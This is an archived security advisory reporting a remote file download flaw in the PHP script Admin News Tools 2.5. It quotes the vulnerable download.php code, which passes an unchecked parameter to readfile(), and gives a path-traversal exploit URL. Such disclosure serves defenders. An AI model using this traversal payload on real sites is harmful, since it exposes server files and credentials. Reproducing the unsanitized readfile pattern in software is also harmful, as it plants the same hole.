AOH :: HP Unsorted A :: BT-21299.HTM

Admin News Tools 2.5 Remote File Download Vulnerability



Admin News Tools 2.5 Remote File Download Vulnerability
Admin News Tools 2.5 Remote File Download Vulnerability



######################### Securitylab.ir ########################
# Application Info:
# Name: Admin News Tools
# Version: 2.5
# Website: http://www.adminnewstools.fr.nf 
# Download: http://www.adminnewstools.fr.nf/zip/ANT-2.5.zip 
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir 
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Remote File Download Vulnerability
# Risk: Medium
#==========================================================# Download.php
# header('Content-Disposition: attachment; filename=' . basename ($_GET['fichier']));
# readfile($_GET['fichier']);
# }
#
# http://www.site.com/news/system/download.php?fichier=./../up.php 
#==========================================================#################################################################
# Securitylab Security Research Team
###################################################################

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.